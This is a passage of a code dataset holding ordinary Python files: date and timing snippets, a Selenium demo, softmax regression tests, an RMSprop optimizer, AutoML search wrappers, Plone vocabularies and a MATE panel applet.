datetime(2000, 2, 28, 23, 59)\n b = datetime(2000, 3, 1)\n print(type((b - a)))\n\n\n import math\n from datetime import datetime, timedelta\n\n\n begin = datetime(2018, 4, 3)\n end = datetime(2018, 7, 7)\n print(math.ceil((end - begin) / timedelta(weeks=1)))\n print(math.ceil((end - begin) / timedelta(weeks=2)))\n\n\n import parsedatetime as pdt\n\n\n cal = pdt.Calendar()\n time_struct, parse_status = cal.parse(\"hello\")\n print(time_struct)\n print(parse_status)\n\n\n\n import calendar\n\n\n calendar.prmonth(2018, 6)\n print(\"\\n\", calendar.monthcalendar(2018, 6))\n\n\n import time\n\n\n print(time.time())\n #time.sleep(2)\n print(\"I was delayed by 2 seconds!\")\n\n\n\n\n import random\n import time\n\n\n size = 10000\n seq = random.sample(range(10000000000), k=size)\n start = time.time()\n seq.sort()\n end = time.time()\n print(f\"It took {end - start: .3f} seconds to sort {size} numbers.\")\n\n\n\n import random\n import time\n\n\n def avg_performance(func, trials=100):\n results = []\n for i in range(trials):\n start = time.time()\n func()\n end = time.time()\n results.append(end-start)\n \n return sum(results) / trials\n\n #print(f\"Average of: {avg:.3f}s over {trials} trials.\")\n\n\n\n\n import timeit\n\n\n size = 100\n seq = random.sample(range(10000000000), k=size)\n print(timeit.timeit(seq.sort))\n\n\ndef func():\n \"~\".join(str(n) for n in range(100))","sub_path":"2018/10/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"430873146","text":"from selenium import webdriver\r\n# all browsers expose an executable file.\r\n# through selenium test we need to invoke the executable file which will then invoke the actual browser\r\n# driver = webdriver.Chrome(executable_path=\"C:\\\\chromedriver.exe\")\r\n\r\ndriver = webdriver.Firefox(executable_path=\"C:\\\\geckodriver.exe\")\r\n\r\ndriver.get(\"https://www.python.org/\") # get method to hit url on browser\r\n\r\ndriver.maximize_window()\r\n\r\nprint(driver.title) # print the title of the web page\r\n\r\nprint(driver.current_url) # to check if we 
landed on correct web address\r\n\r\ndriver.get(\"https://www.python.org/doc/\")\r\n\r\ndriver.back()\r\n\r\ndriver.minimize_window()\r\n\r\ndriver.close() # closes the browser window. driver.quit() will quit all the windows that are open for automated tests\r\n\r\n","sub_path":"PythonSelenium/BrowserDemo.py","file_name":"BrowserDemo.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"552867261","text":"import unittest\n\nimport numpy as np\n\nfrom numpy.testing import assert_array_equal, assert_array_almost_equal\nfrom src.softmax_regressor import CustomSoftmaxRegressor\n\n\nclass TestSoftmaxRegression(unittest.TestCase):\n\n def setUp(self):\n self.clf = CustomSoftmaxRegressor()\n\n def test_softmax_score(self):\n X = np.asarray(\n [[1, 2, 3],\n [5, 2, 1],\n [4, 2, 5],\n [2, 5, 1]]\n )\n theta = np.asarray(\n [[1, 1, 1],\n [1, 5, 6]]\n )\n\n # theta * X'\n result = np.asarray(\n [[6, 8, 11, 8],\n [29, 21, 44, 33]]\n )\n\n self.clf.weights = theta # simulate training\n self.clf.num_classes = np.shape(theta)[0]\n for i in range(self.clf.num_classes):\n assert_array_equal(result[i, :], self.clf._softmax_score(X, i))\n\n def test_compute_cost(self):\n X = np.asarray(\n [[1.4, 1.2, 4.0, 2.4],\n [6.1, 4.1, 2.3, 3.3],\n [4.5, 4.2, 1.24, 2.4]]\n )\n theta = np.asarray(\n [[1, 1, 4, 5],\n [2, 4, 5, 5]]\n )\n # 2 classes\n Y = np.asarray(\n [[1, 0],\n [0, 1],\n [0, 1]]\n )\n\n cost = 3.000041\n self.clf.weights = theta # simulate training\n self.clf.num_classes = np.shape(theta)[0]\n assert_array_almost_equal(cost, self.clf._compute_cost(X, Y))\n\n def test_softmax_proba(self):\n X = np.asarray(\n [[6, 1, 5],\n [1, 5, 2],\n [2, 1, 5],\n [6, 7, 4]]\n )\n theta = np.asarray(\n [[2, 5, 6],\n [1, 2, 5],\n [3, 1, 3]]\n )\n proba = np.asarray(\n [[0.999, 8.315e-07, 2.26e-06],\n [0.999, 1.523e-08, 1.38e-11],\n [0.999, 4.539e-05, 4.13e-08],\n [1, 3.442e-14, 1.71e-15]]\n )\n\n self.clf.theta = theta\n assert_array_almost_equal(proba, self.clf.predict_proba(X), decimal=3)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Chapter04/test/test_softmax_regressor.py","file_name":"test_softmax_regressor.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"360155110","text":"import numpy as np\n\n\nclass RMSprop:\n \n def __init__(self, fn, fn_grad):\n self.fn = fn\n self.fn_grad = fn_grad\n \n # http://ruder.io/optimizing-gradient-descent/index.html#rmsprop\n def run(self, x_init, y_init, n_iter, lr = 0.001, beta = .9, tol= 1e-5, epsilon = 1e-8):\n x, y = x_init,y_init\n z = self.fn(x, y)\n\n x_path = []\n y_path = []\n z_path = []\n\n x_path.append(x)\n y_path.append(y)\n z_path.append(z)\n\n dx, dy = self.fn_grad(self.fn, x, y)\n \n dx_sq = dx**2\n dy_sq = dy**2\n\n for i in range(n_iter):\n if np.abs(dx) < tol or np.isnan(dx) or np.abs(dy) < tol or np.isnan(dy):\n break\n \n dx, dy = self.fn_grad(self.fn, x, y)\n \n dx_sq = beta * dx_sq + (1 - beta) * dx * dx\n dy_sq = beta * dy_sq + (1 - beta) * dy * dy\n\n x += - lr * dx / np.sqrt(dx_sq + epsilon)\n y += - lr * dy / np.sqrt(dy_sq + epsilon)\n \n x_path.append(x)\n y_path.append(y)\n z = self.fn(x, y)\n z_path.append(z)\n\n if np.isnan(dx) or np.isnan(dy):\n print('\\033[1m RMSprop \\033[0m \\nExploded')\n elif np.abs(dx) < tol and np.abs(dy) < tol:\n print('\\033[1m RMSprop \\033[0m \\nDid not converge')\n else:\n print('\\033[1m RMSprop \\033[0m 
\\nConverged in {} steps. \\nLoss fn {:0.4f} \\nAchieved at coordinates x,y = ({:0.4f}, {:0.4f})'.format(i, z, x, y))\n\n self.z_path_RMSprop = z_path\n self.z_RMSprop = z\n \n return x_path,y_path,z_path\n \n \n","sub_path":"unconstrained_optimization/RMSprop.py","file_name":"RMSprop.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"193773092","text":"\nfrom bottle import post, run, request\nimport threading\nimport time\n\n\ncount = 0\n\n@post('/')\ndef index():\n global count\n count += int(request.body.read())\n return b''\n\n\ndef show():\n prev = 0\n while True:\n start = time.time()\n time.sleep(1)\n now = time.time()\n dur = now - start\n print(int((count - prev) / dur), 'ops')\n start = now\n prev = count\n\nthreading.Thread(target=show).start()\nrun(host='localhost', port=7000, quiet=True)\n","sub_path":"example/benchmark/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"208470404","text":"from five import grok\nfrom opengever.meeting.model import Committee\nfrom opengever.meeting.model import Member\nfrom opengever.meeting.model import Membership\nfrom plone import api\nfrom zope.schema.interfaces import IContextSourceBinder\nfrom zope.schema.interfaces import IVocabularyFactory\nfrom zope.schema.vocabulary import SimpleTerm\nfrom zope.schema.vocabulary import SimpleVocabulary\n\n\nclass CommitteeVocabulary(grok.GlobalUtility):\n grok.provides(IVocabularyFactory)\n grok.name('opengever.meeting.CommitteeVocabulary')\n\n def __call__(self, context):\n terms = []\n\n for committee in self.get_committees():\n terms.append(SimpleTerm(value=committee,\n token=committee.committee_id,\n title=committee.title))\n return SimpleVocabulary(terms)\n\n def get_committees(self):\n return Committee.query.all()\n\n\nclass ActiveCommitteeVocabulary(CommitteeVocabulary):\n grok.name('opengever.meeting.ActiveCommitteeVocabulary')\n\n def get_committees(self):\n return Committee.query.active().all()\n\n\nclass MemberVocabulary(grok.GlobalUtility):\n grok.provides(IVocabularyFactory)\n grok.name('opengever.meeting.MemberVocabulary')\n\n def __call__(self, context):\n terms = []\n\n for member in Member.query.order_by(Member.fullname):\n terms.append(SimpleTerm(value=member,\n token=member.member_id,\n title=member.fullname))\n return SimpleVocabulary(terms)\n\n\n@grok.provider(IContextSourceBinder)\ndef get_committee_member_vocabulary(meetingwrapper):\n meeting = meetingwrapper.model\n members = []\n for membership in Membership.query.for_meeting(meeting):\n member = membership.member\n members.append(\n SimpleVocabulary.createTerm(\n member,\n str(member.member_id),\n member.get_title(show_email_as_link=False)))\n\n return SimpleVocabulary(members)\n\n\nclass LanguagesVocabulary(grok.GlobalUtility):\n grok.provides(IVocabularyFactory)\n grok.name('opengever.meeting.LanguagesVocabulary')\n\n def __call__(self, context):\n ltool = api.portal.get_tool('portal_languages')\n languages = [code.split('-')[0]\n for code in ltool.getSupportedLanguages()]\n\n return SimpleVocabulary(\n [SimpleTerm(language) for language in languages])\n","sub_path":"opengever/meeting/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"593095640","text":"\nimport 
pandas\nfrom celery.result import allow_join_result\nfrom scipy.sparse.csr import csr_matrix\n\nfrom tworaven_apps.solver_interfaces.models import \\\n R_SERVICE, KEY_SUCCESS, KEY_MESSAGE, KEY_DATA\n\nfrom tworaven_solver import Dataset, preprocess\nfrom tworaven_apps.solver_interfaces.util_model import ModelSklearn, ModelH2O, ModelLudwig\nimport uuid\nimport abc\nimport requests\nfrom celery import group\nimport multiprocessing\nimport os\n\nfrom time import sleep\n\n\nclass Search(object):\n system = None\n\n def __init__(self, specification,\n callback_found: str, callback_arguments=None,\n system_params=None, search_id=None):\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n if callback_found not in FOUND_MODEL_CALLBACKS:\n raise ValueError(f'Callback {callback_found} is not found in the list of available model callbacks.')\n\n if search_id is None:\n search_id = self.get_search_id()\n\n self.search_id = search_id\n self.specification = specification\n self.system_params = system_params\n self.callback_found = callback_found\n self.callback_arguments = callback_arguments or {}\n\n @staticmethod\n def get_search_id():\n return str(uuid.uuid4())\n\n @abc.abstractmethod\n def run(self):\n pass\n\n @staticmethod\n def load(system, specification,\n callback_found: str, callback_arguments=None,\n system_params=None, search_id=None):\n return {\n 'auto_sklearn': SearchAutoSklearn,\n 'caret': SearchCaret,\n 'h2o': SearchH2O,\n 'tpot': SearchTPOT,\n 'mljar-supervised': SearchMLJarSupervised,\n 'ludwig': SearchLudwig,\n 'mlbox': SearchMLBox,\n 'TwoRavens': SearchTwoRavens\n }[system](\n specification=specification,\n callback_found=callback_found,\n callback_arguments=callback_arguments,\n system_params=system_params,\n search_id=search_id)\n\n\nclass SearchAutoSklearn(Search):\n system = 'auto_sklearn'\n\n def run(self):\n import autosklearn.classification\n import autosklearn.regression\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe().dropna()\n dataframe.reset_index(drop=True, inplace=True)\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n x = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n # if os.path.exists(tmp_folder):\n # shutil.rmtree(tmp_folder)\n # if os.path.exists(output_folder):\n # shutil.rmtree(output_folder)\n\n # TODO: auto_sklearn has a bug with weak references when certain non-default options are used.\n # Just avoiding this bug for now\n # if 'configuration' in self.specification:\n # config = self.specification['configuration']\n #\n # self.system_params['resampling_strategy_arguments'] = self.system_params.get('resampling_strategy_arguments', {})\n # self.system_params['resampling_strategy_arguments']['shuffle'] = config.get('shuffle', False)\n #\n # if config['method'] == \"HOLDOUT\":\n # self.system_params['resampling_strategy'] = 'holdOut'\n # self.system_params['resampling_strategy_arguments']['train_size'] = max(0, config.get('trainTestRatio')) or .6\n #\n # if config['method'] == \"K_FOLD\":\n # self.system_params['resampling_strategy'] = 'cv'\n # self.system_params['resampling_strategy_arguments']['folds'] = config.get('folds') or 10\n\n if self.specification.get('timeBoundSearch'):\n self.system_params['time_left_for_this_task'] = self.specification.get('timeBoundSearch')\n\n if self.specification.get('timeBoundRun'):\n self.system_params['per_run_time_limit'] = self.specification.get('timeBoundRun')\n # sklearn_temp_path = 
'/ravens_volume/solvers/auto_sklearn/temporary/' + str(uuid.uuid4())\n # tmp_folder = os.path.join(*sklearn_temp_path.split('/'), 'temp')\n # output_folder = os.path.join(*sklearn_temp_path.split('/'), 'output')\n\n # self.system_params['tmp_folder'] = tmp_folder\n # self.system_params['output_folder'] = output_folder\n # self.system_params['delete_tmp_folder_after_terminate'] = False\n\n # turn off daemon flag from the currently running process, to allow child processes from auto_sklearn fit\n multiprocessing.current_process()._config['daemon'] = False\n self.system_params['n_jobs'] = 1\n\n # valid system params\n # https://automl.github.io/auto-sklearn/master/api.html#api\n automl = {\n 'REGRESSION': autosklearn.regression.AutoSklearnRegressor,\n 'CLASSIFICATION': autosklearn.classification.AutoSklearnClassifier\n }[self.specification['problem']['taskType']](**self.system_params)\n\n automl.fit(stimulus.copy(), dataframe[y].copy())\n\n # if self.system_params.get('resampling_strategy') == 'cv':\n automl.refit(stimulus, dataframe[y])\n\n model = ModelSklearn(\n automl,\n system='auto_sklearn',\n search_id=self.search_id,\n predictors=x,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'auto_sklearn'\n }\n }\n\n\nclass SearchCaret(Search):\n system = 'caret'\n\n def run(self):\n return requests.post(R_SERVICE + 'caretSolve.app', json={\n 'search_id': self.search_id,\n 'specification': self.specification,\n 'system_params': self.system_params\n }).json()\n\n\nclass SearchH2O(Search):\n system = 'h2o'\n\n def run(self):\n import h2o\n from h2o.automl import H2OAutoML\n\n # ensure backend solver is running\n h2o.init()\n\n train = h2o.import_file(Dataset(self.specification['input']).get_resource_uri())\n test = None\n\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n if self.specification['problem']['taskType'] == 'CLASSIFICATION':\n if train.types[y] == u'real':\n train[y] = train[y].ascharacter()\n # For classification, response should be a factor\n train[y] = train[y].asfactor()\n\n if 'configuration' in self.specification:\n config = self.specification['configuration']\n\n if config['method'] == \"HOLDOUT\":\n train, test = train.split_frame(\n ratios=[max(0, config.get('trainTestRatio')) or .6],\n seed=config.get('randomSeed'))\n\n if config['method'] == \"K_FOLD\":\n self.system_params['nfolds'] = config.get('folds') or 10\n\n self.system_params['balance_classes'] = config.get('stratified', False)\n\n if 'timeBoundSearch' in self.specification:\n self.system_params['max_runtime_secs'] = self.specification['timeBoundSearch']\n if 'timeBoundRun' in self.specification:\n self.system_params['max_runtime_secs_per_model'] = self.specification['timeBoundRun']\n if 'rankSolutionsLimit' in self.specification:\n self.system_params['max_models'] = self.specification['rankSolutionsLimit']\n\n # sort_metrics = {\n # 'ACCURACY': \"rmse\",\n # 'ROC_AUC': \"auc\",\n # 'MEAN_SQUARED_ERROR': \"mse\",\n # 'ROOT_MEAN_SQUARED_ERROR': \"rmse\",\n # 'MEAN_ABSOLUTE_ERROR': \"mae\",\n # 'LOSS': \"logloss\",\n # }\n # if 'performanceMetric' in self.specification:\n # metric_spec = 
self.specification['performanceMetric']\n # if metric_spec['metric'] in sort_metrics:\n # self.system_params['sort_metric'] = sort_metrics[metric_spec['metric']]\n # self.system_params['stopping_metric'] = sort_metrics[metric_spec['metric']]\n\n # CV models are useful for model comparisons\n # self.system_params['keep_cross_validation_models'] = True\n\n if 'CLASSIFICATION' in self.specification['problem']['taskType']:\n train[y] = train[y].asfactor()\n\n train_params = {\n \"x\": X,\n \"y\": y,\n \"training_frame\": train\n }\n if test:\n train_params['leaderboard_frame'] = test\n\n automl = H2OAutoML(**self.system_params)\n automl.train(**train_params)\n\n if not automl.leader:\n return {\n KEY_SUCCESS: False,\n KEY_MESSAGE: 'no models found',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'h2o'\n }\n }\n\n leaderboard = automl.leaderboard\n\n # take up to 10 models\n for model_id in leaderboard.head(10).as_data_frame()['model_id']:\n model = ModelH2O(\n h2o.get_model(model_id),\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n task=self.specification['problem']['taskType'])\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'h2o'\n }\n }\n\n\nclass SearchTPOT(Search):\n system = 'tpot'\n\n def run(self):\n import tpot\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe().dropna()\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n self.system_params['config_dict'] = 'TPOT sparse'\n\n # if 'configuration' in self.specification:\n # config = self.specification['configuration']\n #\n # if config['method'] == \"HOLDOUT\":\n # self.system_params['cv'] =\n #\n # if config['method'] == \"K_FOLD\":\n # self.system_params['cv'] =\n\n if self.specification.get('timeBoundSearch'):\n self.system_params['max_time_mins'] = self.specification.get('timeBoundSearch') / 60.\n\n if self.specification.get('timeBoundRun'):\n self.system_params['max_eval_time_mins'] = self.specification.get('timeBoundRun') / 60.\n\n # custom scorers cause unidentified SIGSEGV upon exit of search\n # scorer = make_scorer(\n # get_metric(self.specification['performanceMetric']),\n # greater_is_better=should_maximize(self.specification['performanceMetric']))\n # self.system_params['scoring'] = scorer\n self.system_params['n_jobs'] = 1\n\n automl = {\n 'REGRESSION': tpot.TPOTRegressor,\n 'CLASSIFICATION': tpot.TPOTClassifier\n }[self.specification['problem']['taskType']](**self.system_params)\n\n automl.fit(stimulus, dataframe[y])\n\n # selected models along the cost-complexity vs accuracy frontier\n for model_str in automl.pareto_front_fitted_pipelines_:\n model = ModelSklearn(\n automl.pareto_front_fitted_pipelines_[model_str],\n system='tpot',\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'tpot'\n }\n }\n\n\nclass 
SearchMLBox(Search):\n system = 'mlbox'\n FAST_DEBUG = os.environ.get('AUTOML_FAST_DEBUG', 'no') == 'yes'\n\n def run(self):\n import mlbox.model.regression\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe().dropna()\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n strategies = {\n 'REGRESSION': [\"LightGBM\", \"RandomForest\", \"ExtraTrees\", \"Tree\", \"Bagging\", \"AdaBoost\", \"Linear\"],\n 'CLASSIFICATION': [\"LightGBM\", \"RandomForest\", \"ExtraTrees\", \"Tree\", \"Bagging\", \"AdaBoost\", \"Linear\"],\n }\n\n if self.FAST_DEBUG:\n strategies = {\n 'REGRESSION': [\"RandomForest\"],\n 'CLASSIFICATION': [\"RandomForest\"],\n }\n\n solver = {\n 'REGRESSION': mlbox.model.regression.Regressor,\n 'CLASSIFICATION': mlbox.model.classification.Classifier\n }\n\n for strategy in strategies[self.specification['problem']['taskType']]:\n automl = solver[self.specification['problem']['taskType']](strategy=strategy, **self.system_params)\n\n if issubclass(type(stimulus), csr_matrix):\n stimulus = stimulus.toarray()\n\n automl.fit(df_train=pandas.DataFrame(stimulus), y_train=dataframe[y])\n\n model = ModelSklearn(\n automl,\n system='mlbox',\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'mlbox'\n }\n }\n\n\nclass SearchLudwig(Search):\n system = 'ludwig'\n\n def run(self):\n from ludwig.api import LudwigModel\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = dataset.get_dataframe()\n predictors = self.specification['problem']['predictors']\n targets = self.specification['problem']['targets']\n\n target_type = {\n \"REGRESSION\": 'numerical',\n \"CLASSIFICATION\": 'category'\n }[self.specification['problem']['taskType']]\n\n if self.specification['problem']['taskType'] == 'CLASSIFICATION':\n dataframe[targets[0]] = dataframe[targets[0]].astype(str)\n\n # https://github.com/uber/ludwig/blob/master/tests/integration_tests/utils.py\n model_definition = {\n \"input_features\": [{\n \"name\": predictor,\n \"type\": 'category' if predictor in self.specification['problem']['categorical'] else 'numerical'\n } for predictor in predictors],\n \"output_features\": [{\"name\": target, \"type\": target_type} for target in targets]\n }\n\n automl = LudwigModel(model_definition)\n\n train_statistics = automl.train(dataframe)\n\n print('train_statistics')\n print(train_statistics)\n\n model = ModelLudwig(\n automl,\n search_id=self.search_id,\n predictors=predictors,\n targets=targets,\n task=self.specification['problem']['taskType'])\n\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'ludwig'\n }\n }\n\n\nclass SearchMLJarSupervised(Search):\n system = 'mljar-supervised'\n\n def run(self):\n from supervised.automl import AutoML\n\n dataset = Dataset(self.specification['input'])\n\n dataframe = 
dataset.get_dataframe().dropna()\n X = self.specification['problem']['predictors']\n y = self.specification['problem']['targets'][0]\n\n stimulus, preprocessor = preprocess(dataframe, self.specification)\n\n if self.specification.get('timeBoundSearch'):\n self.system_params['total_time_limit'] = self.specification['timeBoundSearch']\n\n if self.specification.get('timeBoundRun'):\n self.system_params['learner_time_limit'] = self.specification['timeBoundRun']\n\n automl = AutoML(**self.system_params)\n\n # mljar seems kind of fragile?\n stimulus = pandas.DataFrame(stimulus)\n stimulus.columns = [str(i).strip() for i in stimulus.columns]\n\n automl.fit(stimulus, dataframe[y])\n\n for model_mljar in sorted(automl._models, key=lambda m: m.get_final_loss())[:4]:\n model = ModelSklearn(\n model_mljar,\n system='mljar-supervised',\n search_id=self.search_id,\n predictors=X,\n targets=[y],\n preprocess=preprocessor,\n task=self.specification['problem']['taskType'])\n\n model.save()\n\n from tworaven_apps.solver_interfaces.tasks import FOUND_MODEL_CALLBACKS\n FOUND_MODEL_CALLBACKS[self.callback_found](model, **(self.callback_arguments or {}))\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'mljar-supervised'\n }\n }\n\n\nclass SearchTwoRavens(Search):\n system = 'TwoRavens'\n\n def run(self):\n from tworaven_apps.solver_interfaces.tasks import pipeline_task\n import tworaven_solver\n\n # make sure time isn't in the predictor or target variables\n problem_specification = self.specification['problem']\n time_column = problem_specification.get('forecastingHorizon', {}).get(\"column\")\n for variable_set in ['targets', 'predictors']:\n if time_column and time_column in problem_specification[variable_set]:\n problem_specification[variable_set].remove(time_column)\n\n # if self.specification['problem']['taskType'] == 'FORECASTING':\n # # make time series regular\n # dataframe = tworaven_solver.format_dataframe_time_index(\n # dataframe=tworaven_solver.Dataset(self.specification['input']).get_dataframe(),\n # date=time_column,\n # granularity_specification=self.specification['problem'].get('timeGranularity'))\n #\n # # save regular time series to disk\n # imputed_dataframe_dir = os.path.join(self.specification['temp_directory'], self.search_id)\n # imputed_dataframe_path = os.path.join(imputed_dataframe_dir, 'trainData.csv')\n # os.makedirs(imputed_dataframe_dir, exist_ok=True)\n # dataframe.to_csv(imputed_dataframe_path, quoting=csv.QUOTE_NONNUMERIC)\n #\n # # update specification to point to new time series\n # self.specification['input'] = {\n # 'name': self.specification['input'].get('name', 'train'),\n # 'resource_uri': 'file://' + imputed_dataframe_path\n # }\n\n manager = tworaven_solver.SearchManager(\n problem_specification=problem_specification,\n system_params=self.system_params)\n\n signatures = []\n while True:\n pipeline_specification = manager.get_pipeline_specification()\n if not pipeline_specification:\n break\n\n signatures.append(pipeline_task.s(\n search_id=self.search_id,\n train_specification=self.specification,\n pipeline_specification=pipeline_specification,\n callback_name=self.callback_found,\n callback_arguments=self.callback_arguments))\n\n result = group(*signatures)()\n with allow_join_result():\n result.join()\n\n return {\n KEY_SUCCESS: True,\n KEY_MESSAGE: 'search complete',\n KEY_DATA: {\n 'search_id': self.search_id,\n 'system': 'TwoRavens'\n }\n 
}\n","sub_path":"tworaven_apps/solver_interfaces/util_search.py","file_name":"util_search.py","file_ext":"py","file_size_in_byte":21194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"483701652","text":"#!/usr/bin/env python\n\n# https://www.systutorials.com/docs/linux/man/1-mate-panel-test-applets/\n\nimport signal\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n# https://github.com/city41/mate-i3-applet/blob/master/log.py\n\n\nimport os\nimport sys\nimport logging\n\ndef exception_handler(type, value, traceback):\n logging.exception(\"Uncaught exception occurred: {}\".format(value))\n\nlogger = logging.getLogger(\"TestAppletLog\")\n\n#logger.setLevel(logging.WARNING)\nlogger.setLevel(logging.DEBUG)\n\nsys.excepthook = exception_handler\n\nfile_handler = logging.FileHandler(os.path.expanduser(\"~/.testapplet.log\"))\nfile_handler.setFormatter(\n logging.Formatter('[%(levelname)s] %(asctime)s: %(message)s', \"%Y-%m-%d %H:%M:%S\")\n)\nlogger.addHandler(file_handler)\n\n#-------------------------------------------------------------------------------\n\nimport gi\ngi.require_version(\"Gtk\", \"3.0\")\ngi.require_version('MatePanelApplet', '4.0')\nfrom gi.repository import Gtk\nfrom gi.repository import MatePanelApplet\nfrom gi.repository import Gdk\n\n \ndef applet_fill(applet):\n #logger.debug(\"applet_fill\")\n #logger.debug(str(applet))\n \n # you can use this path with gio/gsettings\n settings_path = applet.get_preferences_path()\n\n box = Gtk.Box()\n applet.add(box)\n\n label = Gtk.Label(label=\"Label\")\n box.add(label)\n \n #button = Gtk.Button(label=\"Dialog\")\n #button.connect('clicked', show_dialog)\n #button.connect('clicked', create_menu, applet)\n #button.connect(\"button-press-event\", showMenu, applet)\n #button.connect(\"clicked\", showMenu, applet)\n #box.add(button)\n\n #button = Gtk.Button(label=\"Quit\")\n #button.connect('clicked', Gtk.main_quit)\n #box.add(button)\n\n #applet.add_menu(build_menu())\n applet.show_all()\n\n append_menu(applet)\n\n \n#def create_menu(widget, event, applet):\n# f = open('log', 'w')\n# f.write(str(widget)+'\\n')\n# f.write(str(event)+'\\n')\n# f.write(str(applet)+'\\n')\n# f.close()\n\n# menu_xml='' \n# menu_xml='''\n#\t\t\t\n#\t\t\t''' \n# verbs = [(\"About\", showAboutDialog)]\n# applet.setup_menu(menu_xml, verbs, None)\n\n\ndef show_menu(widget, event, applet):\n # https://developer.gnome.org/gdk3/stable/gdk3-Event-Structures.html#GdkEventButton\n\n logging.debug(\"show_menu\")\n \n #if event.type == Gdk.EventType.BUTTON_PRESS and event.button == 1:\n if event.button == 1:\n logging.debug(\"show_menu - button 1\")\n #showMainDialog()\n #show_dialog(widget)\n create_menu(applet)\n #if event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3:\n# elif event.button == 3:\n# logging.debug(\"show_menu - button 3\")\n# widget.emit_stop_by_name(\"button-press-event\")\n# create_menu(applet)\n\n\ndef append_menu(applet):\n logging.debug(\"append_menu\")\n\n #propxml=\"\"\"\n # \n #\t\t\t\"\"\"\n\n\t\t\t \n # https://github.com/mate-desktop/mate-applets/blob/master/mateweather/mateweather-applet.c\n # https://github.com/mate-desktop/mate-applets/blob/master/mateweather/mateweather-applet-menu.xml\n\n menu_xml=\"\"\"\n \n \n \"\"\"\n\t\t\t\n actions = [\n ('AboutAction', None, 'About Test Applet', None, None, show_dialog), \n ('QuitAction', None, 'Quit Test Applet', None, None, Gtk.main_quit), \n ]\n \n action_group = Gtk.ActionGroup(\"TestApplet\") \n action_group.add_actions(actions, 
applet)\n applet.setup_menu(menu_xml, action_group)\n\n\ndef show_dialog(widget, event=None):\n logging.debug(\"show_dialog\")\n logging.debug(str(widget))\n logging.debug(str(event))\n\n win = Gtk.Window()\n win.connect('destroy', Gtk.main_quit)\n win.show_all()\n\n Gtk.main()\n\n \ndef applet_factory(applet, iid, data):\n if iid != \"TestApplet\":\n return False\n \n applet_fill(applet)\n \n return True\n\nMatePanelApplet.Applet.factory_main(\"TestAppletFactory\", True,\n MatePanelApplet.Applet.__gtype__,\n applet_factory, None)\n\n","sub_path":"other-my-applets/panel-applet/testapplet.py","file_name":"testapplet.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
